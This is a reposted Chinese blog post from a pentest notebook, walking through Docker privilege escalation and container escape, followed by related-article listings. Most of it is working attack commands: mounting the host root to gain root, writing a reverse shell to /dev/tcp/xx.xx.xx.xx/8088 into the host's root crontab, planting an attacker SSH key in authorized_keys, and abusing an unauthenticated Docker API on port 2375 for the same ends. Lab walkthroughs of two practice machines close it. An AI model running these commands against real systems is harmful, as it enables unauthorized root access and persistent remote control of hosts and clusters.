Docker漏洞的记录

最新推荐文章于 2024-05-14 08:00:00 发布
最新推荐文章于 2024-05-14 08:00:00 发布
阅读量484 收藏
点赞数
分类专栏: 内网 linux 文章标签: docker 容器 linux
原文链接:https://blog.csdn.net/weixin_46700042/article/details/109532502
版权
内网 同时被 2 个专栏收录
36 篇文章 3 订阅
订阅专栏
linux
15 篇文章 0 订阅
订阅专栏

原文链接:https://www.cnblogs.com/peterpan0707007/p/15246853.html
原文链接:https://blog.csdn.net/weixin_46700042/article/details/109532502
侵删

【实战】Docker漏洞的记录]

Docker容器的特点:

1.轻量级
在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。

2.标准
Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。

3.安全
Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。

关于docker提权(逃逸提权):

默认情况下,Docker 软件包是会默认添加一个 docker 用户组的。Docker 守护进程会允许 root 用户和 docker组用户访问 Docker,给用户提供 Docker 权限;

用户在创建一个docker容器后,容器内默认是root账户,在不需要加sudo的情况下可以任意更改容器内的配置。

正常情况下,这种模式既可以保证一台机器被很多普通用户使用,通过docker容器的隔离,相互之前互不影响;也给用户在容器内开放了充足的权限保证用户可以正常安装软件,修改容器配置等操作。

普通用户如果要想使用 docker,而且不想给 sudo 权限,那么一般会选择把该用户加入 docker 用户组内,同时在 docker 容器内是具有 root 权限的,这样保证了用户对容器的完全控制;

docker 用户组权限:

sudo groupadd docker
#添加docker用户组

sudo gpasswd -a $USER docker
#将当前用户添加至docker用户组

newgrp docker

docker逃逸提权(复现流程):

1.首先使用命令:docker images
用于查看本地已下载的镜像

REPOSITORY # 镜像仓库
TAG # 镜像标签
IMAGE ID # 镜像ID
CREATED # 镜像创建时间
SIZE # 镜像大小

2.如果不存在,
就可以先下载个镜像,然后把root文件夹挂载到上面!!!

使用命令:docker run alpine chroot 来下载镜像文件;
(不存在docker镜像情况下使用)

3.将root文件夹挂载在上面

docker run -it -v /root:/mnt alpine
将文件夹挂载到mnt文件夹

4.可以看到我们已经拥有了root权限

Docker挂载命令逃逸:

-v /root(需要挂载得目录):/abc(新建挂载目录)
参数 -v 将容器外部的目录 / 挂载到容器内部

因为docker环境运行得时候是需要root权限的,所以可以实现提权的目的;

1.1. Docker判断

cat /proc/1/cgroup

img

ls -alh /.dockerenv

img

1.2. Docker反弹shell

条件:

获取到宿主机普通用户权限

当前用户已加入docker用户组

a) 写入计划任务获取root权限

进入容器:

docker run -it -v /:/mnt alpine

echo ‘* * * * * /bin/bash -i > /dev/tcp/xx.xx.xx.xx/8088 0>&1 2>&1’ >> /mnt/var/spool/cron/root

img

注:此语句适用于centos系统

系统任务调度文件:/etc/crontab

用户 XXX 调度文件:

ubuntu下路径

/var/spool/cron/crontabs/xxx

Alpine下路径

/etc/cron.d/xxx

debian下的路径(xxx可以是任意东西)

/etc/cron.d/xxx

或者

/var/spool/cron/crontabs/xxx

但是写这个路径的时候,文件内不能加用户名

攻击机监听:

img

a) 写入ssh密钥获取root权限

攻击机

ssh-keygen -b 4096 -t rsa

三次回车即可生成

img

Docker容器里:

挂载宿主机根目录进入容器

docker run -it -v /:/mnt alpine

echo ‘生成的.pub文件的内容’ >/mnt/root/.ssh/authorized_keys

img

攻击机连接:

ssh -i /home/pentest/.ssh/id_rsa root@xx.xx.xx.xx

img

1.3. Docker配置不当

Docker api未授权访问

docker -H tcp://10.1.1.71:2375 images

img

挂载目录写入计划任务获取root权限,如下图:

远程挂载命令:docker -H tcp://10.1.1.71:2375 run -it -v /:/mnt alpine

img

攻击机监听:

img

熟悉的node,成功获取k8s集群的一台节点服务器权限。

靶机复现验证:

1. HA: Chakravyuh靶机

靶机渗透测试wp

docker提权:
(-v 可以映射到容器外的host文件的参数)

命令:
docker run -v /root:/mnt -it 965ea09ff2eb /bin/sh
含义:docker运行一个交互式的Linux系统,挂载系统的/root 目录到/mnt目录下,这样就可以获取到root目录下的文件内容了

成功得到root权限,实验成功 !!!

2. CyberSploit: 2靶机

靶机渗透测试wp

我们需要联网拉取镜像

命令: docker pull alpine
alpine是迷你的linux系统
命令: docker images
用于查看本地已下载的镜像
命令: docker run -v /:/mnt -it alpine
执行镜像文件

提权成功!!!

在docker中使用alpine

拉取启动
docker pull alpine
docker run -it --name 【containername】 【imagename】
-i 以交互模式运行容器,通常与 -t 同时使用;
-t 为容器重新分配一个伪输入终端,通常与 -i 同时使用;
-d 后台运行容器,并返回容器ID;
文件传输
从主机复制到容器sudo docker cp host_path containerID:container_path
从容器复制到主机sudo docker cp containerID:container_path host_path
总结:
docker 允许挂载主机的目录,那么挂载 /etc 文件之后就可以任意修改主机配置了;

也就是说,原本应该与主机完全隔离的用户系统,通过挂载,容器直接使用了主机的用户系统;在容器内对用户权限的修改,都等同于在主机上进行修改!!!

明月清风~~
关注
专栏目录
Docker漏洞相关
SHELLCODE_8BIT的博客
03-14 1789
Docker容器逃逸漏洞-CVE-2024-21626
最新发布
墨痕诉清风的博客
07-23 464
Snyk 在 Docker 引擎以及其他容器化技术(例如 Kubernetes)使用的 runc <=1.1.11 的所有版本中发现了一个漏洞。利用此问题可能会导致容器逃逸到底层主机操作系统,无论是通过执行恶意映像还是使用恶意 Dockerfile 或上游映像构建映像(即使用时FROM)
Docker安全漏洞
Songbl_的博客
06-30 731
Docker本身提供了加密的远程管理端口2376,配合CA证书,就能提供TLS连接了 生成需要的证书文件 注意设置好自己的目录 openssl genrsa -out ca-key.pem 4096 证书的相关信息,设置自己的 openssl req -x509 -sha256 -batch -subj '/C=CN/ST=Shanghai/L=Shanghai/O=Ghostcloud Co.,Ltd/OU=Laboratory/CN=www.XXX.cn' -new -days 365 -key ca
常见的Docker容器漏洞总结
Python专栏
06-30 1107
关注“网络安全学习圈”微信公众号,回复暗号,立即领取最新。
docker逃逸漏洞(CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1327
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
docker容器漏洞_如何在2020年发现和修复Docker容器漏洞
cumi6497的博客
08-16 2607
docker容器漏洞Containerization allows engineering teams to create a sandbox environment in which to run and test applications. Containers are mostly made up of open-source images pulled in from docker hu...
Linux】kaili实现CVE-2019-5736漏洞复现
2302_76195174的博客
04-29 1571
Docker逃逸是一个安全问题,指的是攻击者从Docker容器逃逸到宿主机系统,获取更高的权限,从而控制整个系统。下面我将详细介绍Docker逃逸的原理、常见方法以及如何防范。
记录DOCKER安装的nacos被扫描到漏洞需要开启认证功能
Lc1628038332的博客
08-24 1423
其中【--env PREFER_HOST_MODE=hostname --env MODE=standalone --env NACOS_AUTH_ENABLE=true】为开启认证模式配置。可以看到启动时会自动将配置的nacos端口加1000作为通信端口进行访问如果配置的nacos端口是8848那通信端口就是9848。docker启动了最新版nacos后(我这时的nacos版本为2.1.1,亲测2.0.3也行)首先原本安装的nacos版本为1.3.1,修改为直接拉取的最新版本镜像。
docker安装bwapp漏洞实验环境 并复现逻辑漏洞中暴力破解实验
记录笔记
04-18 2593
docker search bwapp docker pull raesene/bwapp docker images docker run -it -d -p 8080:80 332 docker ps http://192.168.15.136:8080/install.php 复现 跑出来账号是 bee 密码是 bug 暴力破解的原理就是使用攻击者自己的用户名和密码的字典,一个一个去尝试,尝试是否能够登录,未爆破成功原因就是自有的字典里面的没有这个所需要暴力 用户名和密码的这个
docker修复MySQL踩坑记录
lxl1531的博客
11-28 958
上周实验室有几台服务器中了勒索病毒,然后领导安排专人断了实验室网络,把每台服务器扫描杀毒,结果导致我开发的网站MySQL无法启动, 查看docker日志:docker container logs ci-mysql [root@pa_cicd ~]# docker container logs ci-mysql 报错如下: docker-entrypoint.sh: line 72: mysqld: command not found,感觉应该是container被损坏了,要重新从备份导出一份过来
未授权访问:Docker未授权访问漏洞
qq_68163788的博客
05-14 2621
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker未授权访问漏洞
qq_50854662的博客
10-18 1469
Docker未授权访问漏洞
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
siu~
03-03 1440
1、云原生-Docker安全-容器逃逸&内核漏洞 2、云原生-Docker安全-容器逃逸&版本漏洞 3、云原生-Docker安全-容器逃逸&CDK自动化
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 5375
Docker未授权访问漏洞docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
docker搭建Apache漏洞环境并实现其中几个相关漏洞(centos kali)
weixin_74182283的博客
03-30 1336
Apache(音译为阿帕奇)是世界使用排名第一(应该已经被取代了)的Web服务器软件。它可以运行在几乎所有广泛使用的计算 机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它可以运行在几乎所有广泛使用的计算机平台上。Apache源于NCSA httpd服务器,经过多次修改,成为世界上最流行的Web服务器软件之一。Apache取 自“a patchy server”的读音,意思是充满补丁的服务器,因为它是自由软件,所以不断有人来为它开发 新的功能、新的特性、修改原来的缺陷。
linux docker漏洞,Docker本地权限提升漏洞(CVE-2014-3499)
weixin_33653182的博客
05-16 289
发布日期:2014-07-01更新日期:2014-07-02受影响系统:Docker Docker描述:--------------------------------------------------------------------------------BUGTRAQ ID: 68303CVE(CAN) ID: CVE-2014-3499DockerLinux上的服务提供容器管理。用...
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2444
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker容器安全实践:集中与远程日志记录
正如标题所提及,"配置集中和远程日志记录"是为了确保Docker容器的日志数据的安全性和可恢复性。在描述中指出,Docker支持多种日志驱动程序,使得日志存储既集中又可以远程进行,这符合灾难恢复的要求,增强了系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值